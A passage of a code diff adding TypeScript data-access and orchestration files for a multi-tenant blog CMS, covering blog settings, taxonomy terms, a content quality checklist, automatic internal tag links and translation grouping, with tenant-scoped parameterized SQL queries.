+export async function fetchBlogSettings(
+  tx: Bun.SQL,
+  tenantId: string
+): Promise<BlogSettingsView> {
+  const rows = (await tx`
+    SELECT tenant_id, default_locale, default_visibility, posts_per_page,
+           seo_default_title, seo_default_description, settings, updated_at
+    FROM awcms_blog_settings
+    WHERE tenant_id = ${tenantId}
+  `) as BlogSettingsRow[];
+
+  return toView(tenantId, rows[0] ?? null);
+}
+
+/**
+ * Upsert — merges `patch` onto the existing row (typed columns overwritten
+ * only when present in `patch`; `blogTitle`/`blogDescription`/`rssEnabled`/
+ * `sitemapEnabled` shallow-merged into the existing `settings` jsonb blob,
+ * same merge-patch semantics `updateModuleSettings` uses).
+ */
+export async function upsertBlogSettings(
+  tx: Bun.SQL,
+  tenantId: string,
+  patch: UpdateBlogSettingsInput
+): Promise<BlogSettingsView> {
+  const existing = await fetchBlogSettings(tx, tenantId);
+
+  const defaultLocale = patch.defaultLocale ?? existing.defaultLocale;
+  const defaultVisibility =
+    patch.defaultVisibility ?? existing.defaultVisibility;
+  const postsPerPage = patch.postsPerPage ?? existing.postsPerPage;
+  const seoDefaultTitle =
+    patch.seoDefaultTitle !== undefined
+      ? patch.seoDefaultTitle
+      : existing.seoDefaultTitle;
+  const seoDefaultDescription =
+    patch.seoDefaultDescription !== undefined
+      ? patch.seoDefaultDescription
+      : existing.seoDefaultDescription;
+
+  const extras = {
+    blogTitle: patch.blogTitle ?? existing.blogTitle,
+    blogDescription:
+      patch.blogDescription !== undefined
+        ? patch.blogDescription
+        : existing.blogDescription,
+    rssEnabled: patch.rssEnabled ?? existing.rssEnabled,
+    sitemapEnabled: patch.sitemapEnabled ?? existing.sitemapEnabled,
+    contentQualityChecklistPolicy:
+      patch.contentQualityChecklistPolicy ??
+      existing.contentQualityChecklistPolicy,
+    socialPreviewFallbackImageMediaId:
+      patch.socialPreviewFallbackImageMediaId !== undefined
+        ? patch.socialPreviewFallbackImageMediaId
+        : existing.socialPreviewFallbackImageMediaId,
+    socialPreviewContentImageFallbackEnabled:
+      patch.socialPreviewContentImageFallbackEnabled ??
+      existing.socialPreviewContentImageFallbackEnabled
+  };
+
+  const rows = (await tx`
+    INSERT INTO awcms_blog_settings
+      (tenant_id, default_locale, default_visibility, posts_per_page,
+       seo_default_title, seo_default_description, settings, updated_at)
+    VALUES
+      (${tenantId}, ${defaultLocale}, ${defaultVisibility}, ${postsPerPage},
+       ${seoDefaultTitle}, ${seoDefaultDescription}, ${extras}, now())
+    ON CONFLICT (tenant_id) DO UPDATE SET
+      default_locale = EXCLUDED.default_locale,
+      default_visibility = EXCLUDED.default_visibility,
+      posts_per_page = EXCLUDED.posts_per_page,
+      seo_default_title = EXCLUDED.seo_default_title,
+      seo_default_description = EXCLUDED.seo_default_description,
+      settings = EXCLUDED.settings,
+      updated_at = now()
+    RETURNING tenant_id, default_locale, default_visibility, posts_per_page,
+              seo_default_title, seo_default_description, settings, updated_at
+  `) as BlogSettingsRow[];
+
+  return toView(tenantId, rows[0] ?? null);
+}

--- a/src/modules/blog-content/application/blog-taxonomy-directory.ts
+++ b/src/modules/blog-content/application/blog-taxonomy-directory.ts
@@ -1,0 +1,235 @@
+import type { TaxonomyType } from "../domain/taxonomy-policy";
+import type {
+  CreateBlogTermInput,
+  UpdateBlogTermInput
+} from "../domain/blog-term-validation";
+
+/**
+ * Read/write query module for `awcms_blog_terms` and
+ * `awcms_blog_post_terms` (Issue #537 scaffolded this as a read-only
+ * placeholder; Issue #539 fills in term CRUD and post-term relation
+ * management) — same "directory holds both reads and writes" convention as
+ * `blog-post-directory.ts`/`blog-page-directory.ts`.
+ */
+export type BlogTermView = {
+  id: string;
+  tenantId: string;
+  taxonomyType: TaxonomyType;
+  parentId: string | null;
+  name: string;
+  slug: string;
+  description: string | null;
+  createdAt: Date;
+  updatedAt: Date;
+  deletedAt: Date | null;
+  deletedBy: string | null;
+  deleteReason: string | null;
+};
+
+type BlogTermRow = {
+  id: string;
+  tenant_id: string;
+  taxonomy_type: TaxonomyType;
+  parent_id: string | null;
+  name: string;
+  slug: string;
+  description: string | null;
+  created_at: Date;
+  updated_at: Date;
+  deleted_at: Date | null;
+  deleted_by: string | null;
+  delete_reason: string | null;
+};
+
+function toView(row: BlogTermRow): BlogTermView {
+  return {
+    id: row.id,
+    tenantId: row.tenant_id,
+    taxonomyType: row.taxonomy_type,
+    parentId: row.parent_id,
+    name: row.name,
+    slug: row.slug,
+    description: row.description,
+    createdAt: row.created_at,
+    updatedAt: row.updated_at,
+    deletedAt: row.deleted_at,
+    deletedBy: row.deleted_by,
+    deleteReason: row.delete_reason
+  };
+}
+
+export async function createBlogTerm(
+  tx: Bun.SQL,
+  tenantId: string,
+  input: CreateBlogTermInput
+): Promise<BlogTermView> {
+  const rows = (await tx`
+    INSERT INTO awcms_blog_terms
+      (tenant_id, taxonomy_type, parent_id, name, slug, description)
+    VALUES (
+      ${tenantId}, ${input.taxonomyType}, ${input.parentId}, ${input.name},
+      ${input.slug}, ${input.description}
+    )
+    RETURNING id, tenant_id, taxonomy_type, parent_id, name, slug, description,
+      created_at, updated_at, deleted_at, deleted_by, delete_reason
+  `) as BlogTermRow[];
+
+  return toView(rows[0]!);
+}
+
+export async function fetchBlogTermById(
+  tx: Bun.SQL,
+  tenantId: string,
+  termId: string
+): Promise<BlogTermView | null> {
+  const rows = (await tx`
+    SELECT id, tenant_id, taxonomy_type, parent_id, name, slug, description,
+      created_at, updated_at, deleted_at, deleted_by, delete_reason
+    FROM awcms_blog_terms
+    WHERE tenant_id = ${tenantId} AND id = ${termId} AND deleted_at IS NULL
+  `) as BlogTermRow[];
+
+  const row = rows[0];
+  return row ? toView(row) : null;
+}
+
+export type ListBlogTermsFilter = {
+  taxonomyType?: TaxonomyType;
+};
+
+/** `LIMIT 100`, name ascending — terms are low-cardinality config, same bounded-list convention as email templates. */
+export async function listBlogTerms(
+  tx: Bun.SQL,
+  tenantId: string,
+  filter: ListBlogTermsFilter = {}
+): Promise<BlogTermView[]> {
+  const rows = (await tx`
+    SELECT id, tenant_id, taxonomy_type, parent_id, name, slug, description,
+      created_at, updated_at, deleted_at, deleted_by, delete_reason
+    FROM awcms_blog_terms
+    WHERE tenant_id = ${tenantId} AND deleted_at IS NULL
+      AND (${filter.taxonomyType ?? null}::text IS NULL OR taxonomy_type = ${filter.taxonomyType ?? null})
+    ORDER BY name ASC
+    LIMIT 100
+  `) as BlogTermRow[];
+
+  return rows.map(toView);
+}
+
+/** Thin convenience wrapper kept for the pre-#539 call shape (Issue #537). */
+export async function fetchBlogTermsByTaxonomyType(
+  tx: Bun.SQL,
+  tenantId: string,
+  taxonomyType: TaxonomyType
+): Promise<BlogTermView[]> {
+  return listBlogTerms(tx, tenantId, { taxonomyType });
+}
+
+export async function updateBlogTerm(
+  tx: Bun.SQL,
+  tenantId: string,
+  id: string,
+  input: UpdateBlogTermInput
+): Promise<BlogTermView | null> {
+  const rows = (await tx`
+    UPDATE awcms_blog_terms
+    SET taxonomy_type = COALESCE(${input.taxonomyType ?? null}, taxonomy_type),
+        parent_id = CASE
+          WHEN ${input.parentId === undefined} THEN parent_id
+          ELSE ${input.parentId ?? null}
+        END,
+        name = COALESCE(${input.name ?? null}, name),
+        slug = COALESCE(${input.slug ?? null}, slug),
+        description = CASE
+          WHEN ${input.description === undefined} THEN description
+          ELSE ${input.description ?? null}
+        END,
+        updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${id} AND deleted_at IS NULL
+    RETURNING id, tenant_id, taxonomy_type, parent_id, name, slug, description,
+      created_at, updated_at, deleted_at, deleted_by, delete_reason
+  `) as BlogTermRow[];
+
+  return rows[0] ? toView(rows[0]) : null;
+}
+
+export async function softDeleteBlogTerm(
+  tx: Bun.SQL,
+  tenantId: string,
+  actorTenantUserId: string,
+  id: string,
+  reason: string
+): Promise<boolean> {
+  const rows = await tx`
+    UPDATE awcms_blog_terms
+    SET deleted_at = now(), deleted_by = ${actorTenantUserId}, delete_reason = ${reason},
+        updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${id} AND deleted_at IS NULL
+    RETURNING id
+  `;
+
+  return rows.length > 0;
+}
+
+/**
+ * Post <-> term assignment (doc issue #539 §Scope: "Post-term relation
+ * handling"). No dedicated REST route is listed for this in the issue —
+ * it is embedded in the blog post create/update payload instead
+ * (`termIds?: string[]`, see `blog-post-validation.ts`/
+ * `blog-post-directory.ts`). Full replace semantics (delete all existing
+ * assignments for the post, then insert the given set) rather than a diff
+ * — simplest correct behavior for a small per-post tag/category list, same
+ * "PATCH replaces the whole sub-resource" precedent
+ * `module_management`'s settings merge docs contrast against (this is
+ * the "replace", not "merge", side of that distinction, since the caller
+ * always sends the complete desired term list).
+ */
+export async function syncPostTermAssignments(
+  tx: Bun.SQL,
+  tenantId: string,
+  postId: string,
+  termIds: readonly string[]
+): Promise<void> {
+  await tx`
+    DELETE FROM awcms_blog_post_terms
+    WHERE tenant_id = ${tenantId} AND post_id = ${postId}
+  `;
+
+  for (const termId of termIds) {
+    await tx`
+      INSERT INTO awcms_blog_post_terms (tenant_id, post_id, term_id)
+      VALUES (${tenantId}, ${postId}, ${termId})
+    `;
+  }
+}
+
+export async function fetchPostTermIds(
+  tx: Bun.SQL,
+  tenantId: string,
+  postId: string
+): Promise<string[]> {
+  const rows = (await tx`
+    SELECT term_id FROM awcms_blog_post_terms
+    WHERE tenant_id = ${tenantId} AND post_id = ${postId}
+  `) as { term_id: string }[];
+
+  return rows.map((row) => row.term_id);
+}
+
+/** Used before `syncPostTermAssignments` to reject a `termIds` list containing an id that doesn't exist (or belongs to another tenant, or is soft-deleted) — a bare FK violation would otherwise surface as a raw 500. */
+export async function countExistingTerms(
+  tx: Bun.SQL,
+  tenantId: string,
+  termIds: readonly string[]
+): Promise<number> {
+  if (termIds.length === 0) {
+    return 0;
+  }
+
+  const rows = (await tx`
+    SELECT count(*)::int AS count FROM awcms_blog_terms
+    WHERE tenant_id = ${tenantId} AND deleted_at IS NULL AND id = ANY(${tx.array([...termIds], "uuid")})
+  `) as { count: number }[];
+
+  return rows[0]?.count ?? 0;
+}

--- a/src/modules/blog-content/application/content-quality-checklist-gate.ts
+++ b/src/modules/blog-content/application/content-quality-checklist-gate.ts
@@ -1,0 +1,179 @@
+/**
+ * Application-layer orchestration for Issue #640's content quality
+ * checklist — the database/port-touching half of `content-quality-
+ * checklist.ts`'s pure evaluator, same split as `news-media-reference-
+ * gate.ts` (Issue #636) uses for the same reason: `domain` stays pure/
+ * synchronously testable, this file does the real DB round trips and is
+ * injected the caller's `NewsMediaPort` (never imports `news_portal`
+ * directly — see `_shared/ports/news-media-port.ts`'s header and
+ * `tests/unit/module-boundary.test.ts`).
+ *
+ * Called from THREE composition roots (route handlers/scripts, per
+ * ADR-0011): `POST /api/v1/blog/posts/{id}/publish`,
+ * `POST /api/v1/blog/posts/{id}/schedule`, and the scheduled-publish worker
+ * (`blog-scheduled-publish.ts`) — each injects `newsMediaPortAdapter` from
+ * `news-portal/application/news-media-port-adapter.ts`. Also called
+ * read-only by the `GET .../quality-checklist` preview endpoints (posts AND
+ * pages) that back the admin editor's checklist panel (Issue #640
+ * acceptance criterion: "Checklist is available in admin post/page
+ * editor").
+ */
+import { collectGalleryImageReferences } from "../domain/content-block-media-references";
+import {
+  evaluateContentQualityChecklist,
+  notApplicableChecklistResult,
+  type ChecklistContentKind,
+  type ChecklistPolicyOverrides,
+  type ContentQualityChecklistResult
+} from "../domain/content-quality-checklist";
+import { resolveSocialPreviewImageSourceId } from "../domain/social-preview-image-resolution";
+import type { NewsMediaPort } from "../../_shared/ports/news-media-port";
+
+export type ChecklistEvaluableContent = {
+  title: string;
+  slug: string;
+  excerpt: string | null;
+  metaDescription: string | null;
+  contentText: string;
+  contentJson: Record<string, unknown>;
+  featuredMediaId: string | null;
+  /** Issue #649 — explicit "use this image for social/SEO preview" override. Optional/omittable — `awcms_blog_pages` has no such column, so the "page" content kind's caller simply never provides it (treated as `null`, same as not having one). */
+  seoImageMediaId?: string | null;
+};
+
+/** Issue #649 — tenant-level social preview fallback settings (`blog-settings-directory.ts`'s `BlogSettingsView`), threaded through so the checklist's `social_preview_image_ready`/`social_preview_image_alt_text` rules use the EXACT SAME priority chain the render route resolves against — reused, not re-derived. */
+export type SocialPreviewFallbackOptions = {
+  tenantFallbackImageMediaId: string | null;
+  contentImageFallbackEnabled: boolean;
+};
+
+export type EvaluateContentQualityChecklistOptions = {
+  /** Present (non-null) only for the "schedule" action's own request body — `null` for an immediate publish or the scheduled-publish worker's due-post re-check. */
+  scheduledAt?: Date | null;
+  now?: Date;
+  /** Omitted (or `null`) means no tenant fallback and no content-image fallback candidate — the checklist can still evaluate `social_preview_image_ready` from `featuredMediaId`/`seoImageMediaId` alone. */
+  socialPreviewFallback?: SocialPreviewFallbackOptions | null;
+};
+
+/**
+ * `termCount` is the caller's job to fetch (`fetchPostTermIds(tx, tenantId,
+ * postId).length`, `blog-taxonomy-directory.ts`) — this file doesn't take a
+ * `postId` at all, only content values, so it can also serve the "preview
+ * before the post exists yet" case a future admin UI draft-preview might
+ * want (not built by this issue, but the shape doesn't preclude it).
+ */
+export async function evaluateContentQualityChecklistForContent(
+  tx: Bun.SQL,
+  tenantId: string,
+  contentKind: ChecklistContentKind,
+  content: ChecklistEvaluableContent,
+  termCount: number,
+  mediaPort: NewsMediaPort,
+  overrides: ChecklistPolicyOverrides,
+  options: EvaluateContentQualityChecklistOptions = {},
+  env: NodeJS.ProcessEnv = process.env
+): Promise<ContentQualityChecklistResult> {
+  const modeActive = await mediaPort.isFullOnlineR2ModeActiveForTenant(
+    tx,
+    tenantId,
+    env
+  );
+
+  if (!modeActive) {
+    return notApplicableChecklistResult();
+  }
+
+  const {
+    mediaObjectIds: galleryMediaObjectIds,
+    violations: galleryViolations
+  } = collectGalleryImageReferences(content.contentJson);
+
+  const socialPreviewFallback = options.socialPreviewFallback ?? null;
+
+  const idsToResolve = new Set<string>();
+  if (content.featuredMediaId) {
+    idsToResolve.add(content.featuredMediaId);
+  }
+  if (content.seoImageMediaId) {
+    idsToResolve.add(content.seoImageMediaId);
+  }
+  for (const id of galleryMediaObjectIds) {
+    idsToResolve.add(id);
+  }
+  if (socialPreviewFallback?.tenantFallbackImageMediaId) {
+    idsToResolve.add(socialPreviewFallback.tenantFallbackImageMediaId);
+  }
+
+  const resolved = await mediaPort.resolveMediaReferences(tx, tenantId, [
+    ...idsToResolve
+  ]);
+
+  const featuredMedia = content.featuredMediaId
+    ? (resolved.get(content.featuredMediaId) ?? null)
+    : null;
+
+  const unsafeGalleryMediaObjectIds = galleryMediaObjectIds.filter(
+    (id) => !resolved.has(id)
+  );
+
+  // Issue #649 — same priority chain the render route uses
+  // (`news-article-seo-metadata.ts`'s `buildNewsArticleSeoMetadata`), so the
+  // checklist's readiness rules can never silently diverge from what a
+  // shared link actually renders.
+  const socialPreviewMediaId = resolveSocialPreviewImageSourceId(
+    {
+      explicitSocialImageMediaId: content.seoImageMediaId ?? null,
+      featuredMediaId: content.featuredMediaId,
+      contentImageMediaIds: socialPreviewFallback?.contentImageFallbackEnabled
+        ? galleryMediaObjectIds
+        : [],
+      tenantFallbackImageMediaId:
+        socialPreviewFallback?.tenantFallbackImageMediaId ?? null
+    },
+    new Set(resolved.keys())
+  );
+  const socialPreviewMedia = socialPreviewMediaId
+    ? (resolved.get(socialPreviewMediaId) ?? null)
+    : null;
+
+  return evaluateContentQualityChecklist(
+    {
+      contentKind,
+      title: content.title,
+      slug: content.slug,
+      excerpt: content.excerpt,
+      metaDescription: content.metaDescription,
+      contentText: content.contentText,
+      contentJson: content.contentJson,
+      featuredMediaId: content.featuredMediaId,
+      featuredMedia: featuredMedia
+        ? {
+            altText: featuredMedia.altText,
+            width: featuredMedia.width,
+            height: featuredMedia.height,
+            mimeType: featuredMedia.mimeType,
+            sizeBytes: featuredMedia.sizeBytes
+          }
+        : null,
+      galleryViolations,
+      unsafeGalleryMediaObjectIds,
+      termCount,
+      scheduledAt: options.scheduledAt ?? null,
+      now: options.now ?? new Date(),
+      socialPreviewImage: socialPreviewMedia
+        ? { altText: socialPreviewMedia.altText }
+        : null
+    },
+    overrides
+  );
+}
+
+/** `{ field: ruleId, message }` pairs for every failed blocking rule — matches the existing `ErrorDetail` envelope shape (`ApiError.error.details`) the rest of this API already uses (`VALIDATION_ERROR`, `NEWS_MEDIA_REFERENCE_INVALID`), so a blocked publish/schedule response needs no new response envelope shape. */
+export function checklistBlockersToErrorDetails(
+  result: ContentQualityChecklistResult
+): { field: string; message: string }[] {
+  return result.blockers.map((blocker) => ({
+    field: blocker.ruleId,
+    message: blocker.message
+  }));
+}

--- a/src/modules/blog-content/application/internal-tag-link-rendering.ts
+++ b/src/modules/blog-content/application/internal-tag-link-rendering.ts
@@ -1,0 +1,180 @@
+/**
+ * Application-layer orchestration for automatic internal tag linking
+ * (Issue #641) — the single place that combines deployment config
+ * (`internal-tag-linking-config.ts`), tenant policy
+ * (`internal-tag-link-settings-directory.ts`), the tenant's tag catalog
+ * (`blog-taxonomy-directory.ts`), and a per-post override flag into one
+ * resolved `InternalTagLinkingPolicy` + candidate list, then calls the
+ * pure rendering engine (`internal-tag-linking.ts`). Both public post
+ * routes (`/news/{slug}`, `/blog/{tenantCode}/{slug}`) and the admin
+ * preview endpoint (`GET /api/v1/blog/posts/{id}/internal-links/preview`)
+ * call through here so the "which tags are eligible, what's the effective
+ * policy" logic can never drift between render time and preview time.
+ */
+import {
+  resolveBlogAutoInternalTagLinksConfig,
+  type BlogAutoInternalTagLinksConfig
+} from "../domain/internal-tag-linking-config";
+import {
+  applyInternalTagLinksToHtml,
+  type InternalTagLinkCandidate,
+  type InternalTagLinkingPolicy,
+  type InternalTagLinkingResult
+} from "../domain/internal-tag-linking";
+import { listBlogTerms } from "./blog-taxonomy-directory";
+import { fetchInternalTagLinkingSettings } from "./internal-tag-link-settings-directory";
+
+export type InternalTagLinkingDisabledReason =
+  "deployment_disabled" | "tenant_disabled" | "post_disabled";
+
+export type InternalTagLinkingContext = {
+  /** Final resolved enabled flag — env AND tenant AND (caller-supplied) per-post flag. */
+  enabled: boolean;
+  disabledReason: InternalTagLinkingDisabledReason | null;
+  policy: InternalTagLinkingPolicy;
+  candidates: InternalTagLinkCandidate[];
+};
+
+function buildTagArchiveUrl(basePath: string, slug: string): string {
+  return `${basePath}/tag/${slug}`;
+}
+
+/**
+ * Resolves the full linking context for one tenant/post. `postAuto
+ * InternalTagLinksDisabled` is the caller-supplied per-post override
+ * (`awcms_blog_posts.auto_internal_tag_links_disabled`) — this
+ * function does not fetch the post itself (callers already have it).
+ *
+ * When disabled at ANY level, `candidates` is still populated for callers
+ * that want to show it (currently none do) but `enabled: false` and
+ * `disabledReason` tells the caller not to bother rendering/linking at
+ * all — `applyInternalTagLinksToHtml` itself also independently no-ops on
+ * `policy.enabled === false`, so this is defense-in-depth, not the only
+ * gate.
+ */
+export async function resolveInternalTagLinkingContext(
+  tx: Bun.SQL,
+  tenantId: string,
+  basePath: string,
+  postAutoInternalTagLinksDisabled: boolean,
+  env: NodeJS.ProcessEnv = process.env
+): Promise<InternalTagLinkingContext> {
+  const deploymentConfig: BlogAutoInternalTagLinksConfig =
+    resolveBlogAutoInternalTagLinksConfig(env);
+  const tenantSettings = await fetchInternalTagLinkingSettings(tx, tenantId);
+
+  let disabledReason: InternalTagLinkingDisabledReason | null = null;
+  if (!deploymentConfig.enabled) {
+    disabledReason = "deployment_disabled";
+  } else if (!tenantSettings.enabled) {
+    disabledReason = "tenant_disabled";
+  } else if (postAutoInternalTagLinksDisabled) {
+    disabledReason = "post_disabled";
+  }
+
+  const enabled = disabledReason === null;
+
+  const allTags = await listBlogTerms(tx, tenantId, { taxonomyType: "tag" });
+  const disabledTagIdSet = new Set(tenantSettings.disabledTagIds);
+  const candidates: InternalTagLinkCandidate[] = allTags
+    .filter((term) => !disabledTagIdSet.has(term.id))
+    .map((term) => ({
+      tagId: term.id,
+      name: term.name,
+      url: buildTagArchiveUrl(basePath, term.slug)
+    }));
+
+  const policy: InternalTagLinkingPolicy = {
+    enabled,
+    maxPerPost: deploymentConfig.maxPerPost,
+    maxPerTag: deploymentConfig.maxPerTag,
+    minTermLength: deploymentConfig.minTermLength,
+    linkFirstOccurrenceOnly: deploymentConfig.linkFirstOccurrenceOnly,
+    excludeHeadings: deploymentConfig.excludeHeadings,
+    caseInsensitive: tenantSettings.caseInsensitive
+  };
+
+  return { enabled, disabledReason, policy, candidates };
+}
+
+/**
+ * Convenience wrapper for the public post-detail routes — resolves the
+ * context and applies linking in one call, discarding match details (the
+ * routes only need the final HTML). Never throws on a missing/misconfigured
+ * tenant policy row (`fetchInternalTagLinkingSettings` already falls back
+ * to defaults) — a rendering failure here would take down the whole public
+ * page, so this function's contract is "always returns renderable HTML."
+ */
+export async function renderContentHtmlWithInternalTagLinks(
+  tx: Bun.SQL,
+  tenantId: string,
+  html: string,
+  postAutoInternalTagLinksDisabled: boolean,
+  basePath: string,
+  env: NodeJS.ProcessEnv = process.env
+): Promise<string> {
+  const context = await resolveInternalTagLinkingContext(
+    tx,
+    tenantId,
+    basePath,
+    postAutoInternalTagLinksDisabled,
+    env
+  );
+
+  if (!context.enabled) {
+    return html;
+  }
+
+  const result = await applyInternalTagLinksToHtml(
+    html,
+    context.candidates,
+    context.policy
+  );
+
+  return result.html;
+}
+
+export type InternalTagLinkingPreview = {
+  enabled: boolean;
+  disabledReason: InternalTagLinkingDisabledReason | null;
+  result: InternalTagLinkingResult;
+};
+
+/**
+ * Used by the preview endpoint — same resolution as the render path above,
+ * but returns the full `matches` list (and reports `disabledReason`
+ * instead of silently no-op'ing) so an editor can see WHY nothing would be
+ * linked, not just that nothing was.
+ */
+export async function previewInternalTagLinksForContent(
+  tx: Bun.SQL,
+  tenantId: string,
+  html: string,
+  postAutoInternalTagLinksDisabled: boolean,
+  basePath: string,
+  env: NodeJS.ProcessEnv = process.env
+): Promise<InternalTagLinkingPreview> {
+  const context = await resolveInternalTagLinkingContext(
+    tx,
+    tenantId,
+    basePath,
+    postAutoInternalTagLinksDisabled,
+    env
+  );
+
+  if (!context.enabled) {
+    return {
+      enabled: false,
+      disabledReason: context.disabledReason,
+      result: { html, matches: [] }
+    };
+  }
+
+  const result = await applyInternalTagLinksToHtml(
+    html,
+    context.candidates,
+    context.policy
+  );
+
+  return { enabled: true, disabledReason: null, result };
+}

--- a/src/modules/blog-content/application/internal-tag-link-settings-directory.ts
+++ b/src/modules/blog-content/application/internal-tag-link-settings-directory.ts
@@ -1,0 +1,139 @@
+/**
+ * `awcms_blog_internal_tag_link_settings` read/write (Issue #641) —
+ * one row per tenant, same upsert convention `theme-settings-directory.ts`
+ * uses for `awcms_blog_theme_settings`. A tenant that never
+ * configured this reads back the table's own column defaults (`enabled =
+ * true`, `caseInsensitive = false`, `disabledTagIds = []`) — same
+ * "missing row = default" convention `fetchBlogSettings` uses.
+ */
+import type { UpdateInternalTagLinkingSettingsInput } from "../domain/internal-tag-linking-policy";
+
+export type InternalTagLinkingSettingsView = {
+  tenantId: string;
+  enabled: boolean;
+  caseInsensitive: boolean;
+  disabledTagIds: string[];
+  updatedAt: string | null;
+};
+
+type InternalTagLinkingSettingsRow = {
+  tenant_id: string;
+  enabled: boolean;
+  case_insensitive: boolean;
+  /** Bun's Postgres driver returns an array column as its raw `{a,b,c}` wire-format text, NOT a parsed JS array — see `parsePostgresUuidArray` below. */
+  disabled_tag_ids: string | string[] | null;
+  updated_at: Date;
+};
+
+const DEFAULT_SETTINGS = {
+  enabled: true,
+  caseInsensitive: false,
+  disabledTagIds: [] as string[]
+};
+
+/**
+ * Bun.SQL does not auto-deserialize a Postgres array column into a JS
+ * array (verified empirically: a `uuid[]` column round-trips as the literal
+ * wire-format string `"{uuid1,uuid2}"`, `typeof === "string"`) — this
+ * parses that format. Safe for UUIDs specifically (no commas/braces/quotes
+ * to escape within an element), which is the only element type this column
+ * ever holds. Defensively also accepts an already-parsed array in case a
+ * future Bun version changes this behavior.
+ */
+function parsePostgresUuidArray(value: string | string[] | null): string[] {
+  if (value === null) return [];
+  if (Array.isArray(value)) return [...value];
+  const trimmed = value.trim();
+  if (trimmed === "{}" || trimmed.length === 0) return [];
+  return trimmed.replace(/^\{/, "").replace(/\}$/, "").split(",");
+}
+
+function toView(
+  tenantId: string,
+  row: InternalTagLinkingSettingsRow | null
+): InternalTagLinkingSettingsView {
+  if (!row) {
+    return {
+      tenantId,
+      enabled: DEFAULT_SETTINGS.enabled,
+      caseInsensitive: DEFAULT_SETTINGS.caseInsensitive,
+      disabledTagIds: [...DEFAULT_SETTINGS.disabledTagIds],
+      updatedAt: null
+    };
+  }
+
+  return {
+    tenantId,
+    enabled: row.enabled,
+    caseInsensitive: row.case_insensitive,
+    disabledTagIds: parsePostgresUuidArray(row.disabled_tag_ids),
+    updatedAt: row.updated_at.toISOString()
+  };
+}
+
+export async function fetchInternalTagLinkingSettings(
+  tx: Bun.SQL,
+  tenantId: string
+): Promise<InternalTagLinkingSettingsView> {
+  const rows = (await tx`
+    SELECT tenant_id, enabled, case_insensitive, disabled_tag_ids, updated_at
+    FROM awcms_blog_internal_tag_link_settings
+    WHERE tenant_id = ${tenantId}
+  `) as InternalTagLinkingSettingsRow[];
+
+  return toView(tenantId, rows[0] ?? null);
+}
+
+/** Upsert — merges `patch` onto the existing row (or the defaults, for a tenant's first write). */
+export async function upsertInternalTagLinkingSettings(
+  tx: Bun.SQL,
+  tenantId: string,
+  patch: UpdateInternalTagLinkingSettingsInput
+): Promise<InternalTagLinkingSettingsView> {
+  const existing = await fetchInternalTagLinkingSettings(tx, tenantId);
+
+  const enabled = patch.enabled ?? existing.enabled;
+  const caseInsensitive = patch.caseInsensitive ?? existing.caseInsensitive;
+  const disabledTagIds = patch.disabledTagIds ?? existing.disabledTagIds;
+
+  const rows = (await tx`
+    INSERT INTO awcms_blog_internal_tag_link_settings
+      (tenant_id, enabled, case_insensitive, disabled_tag_ids, updated_at)
+    VALUES
+      (${tenantId}, ${enabled}, ${caseInsensitive}, ${tx.array(disabledTagIds, "uuid")}, now())
+    ON CONFLICT (tenant_id) DO UPDATE SET
+      enabled = EXCLUDED.enabled,
+      case_insensitive = EXCLUDED.case_insensitive,
+      disabled_tag_ids = EXCLUDED.disabled_tag_ids,
+      updated_at = now()
+    RETURNING tenant_id, enabled, case_insensitive, disabled_tag_ids, updated_at
+  `) as InternalTagLinkingSettingsRow[];
+
+  return toView(tenantId, rows[0] ?? null);
+}
+
+/**
+ * Counts how many of `tagIds` are real, same-tenant, non-deleted,
+ * `taxonomy_type = 'tag'` terms — used to reject a `disabledTagIds` entry
+ * that doesn't exist / belongs to another tenant / is actually a category,
+ * same "verify existence before accepting an id list" convention
+ * `countExistingTerms` (`blog-taxonomy-directory.ts`) already established
+ * for `termIds`.
+ */
+export async function countExistingTagTermIds(
+  tx: Bun.SQL,
+  tenantId: string,
+  tagIds: readonly string[]
+): Promise<number> {
+  if (tagIds.length === 0) {
+    return 0;
+  }
+
+  const rows = (await tx`
+    SELECT count(*)::int AS count FROM awcms_blog_terms
+    WHERE tenant_id = ${tenantId} AND deleted_at IS NULL AND taxonomy_type = 'tag'
+      AND id = ANY(${tx.array([...tagIds], "uuid")})
+  `) as { count: number }[];
+
+  return rows[0]?.count ?? 0;
+}

--- a/src/modules/blog-content/application/localized-content-directory.ts
+++ b/src/modules/blog-content/application/localized-content-directory.ts
@@ -1,0 +1,62 @@
+/**
+ * Multilingual content linking (Issue #542 §Multilingual Content: "Support
+ * locale-based content storage and retrieval... Content slug uniqueness
+ * must remain tenant + locale aware"). The per-locale storage/retrieval
+ * itself and the tenant+locale+slug uniqueness were already true since
+ * Issue #537 (`awcms_blog_posts.locale` + the partial unique index) —
+ * this file only adds the ability to *link* several locale-variants of one
+ * logical post together via the optional `translation_group_id` column
+ * (migration 029). Deliberately a standalone one-column
+ * `UPDATE`/`SELECT` pair rather than folding into `blog-post-directory.ts`'s
+ * `createBlogPost`/`updateBlogPost` — those already have a wide column
+ * list touched by every prior issue in this epic; a single narrow function
+ * here is lower-risk than threading one more optional field through every
+ * `RETURNING` clause in that file.
+ */
+export type PostTranslationSummary = {
+  id: string;
+  title: string;
+  slug: string;
+  locale: string;
+};
+
+type PostTranslationRow = {
+  id: string;
+  title: string;
+  slug: string;
+  locale: string;
+};
+
+/** Sets (or clears, with `null`) the translation group for a post. Returns `false` if the post doesn't exist for this tenant (not-deleted). */
+export async function setPostTranslationGroup(
+  tx: Bun.SQL,
+  tenantId: string,
+  postId: string,
+  translationGroupId: string | null
+): Promise<boolean> {
+  const rows = await tx`
+    UPDATE awcms_blog_posts
+    SET translation_group_id = ${translationGroupId}, updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${postId} AND deleted_at IS NULL
+    RETURNING id
+  `;
+
+  return rows.length > 0;
+}
+
+/** Every non-deleted post sharing a `translationGroupId`, one row per locale. */
+export async function fetchPostTranslations(
+  tx: Bun.SQL,
+  tenantId: string,
+  translationGroupId: string
+): Promise<PostTranslationSummary[]> {
+  const rows = (await tx`
+    SELECT id, title, slug, locale
+    FROM awcms_blog_posts
+    WHERE tenant_id = ${tenantId} AND translation_group_id = ${translationGroupId}
+      AND deleted_at IS NULL
+    ORDER BY locale ASC
+  `) as PostTranslationRow[];
+
+  return rows;
+}

--- a/src/modules/blog-content/application/menu-directory.ts
+++ b/src/modules/blog-content/application/menu-directory.ts
@@ -1,0 +1,217 @@
+import type { MenuItemInput, MenuLinkType } from "../domain/menu-policy";
+
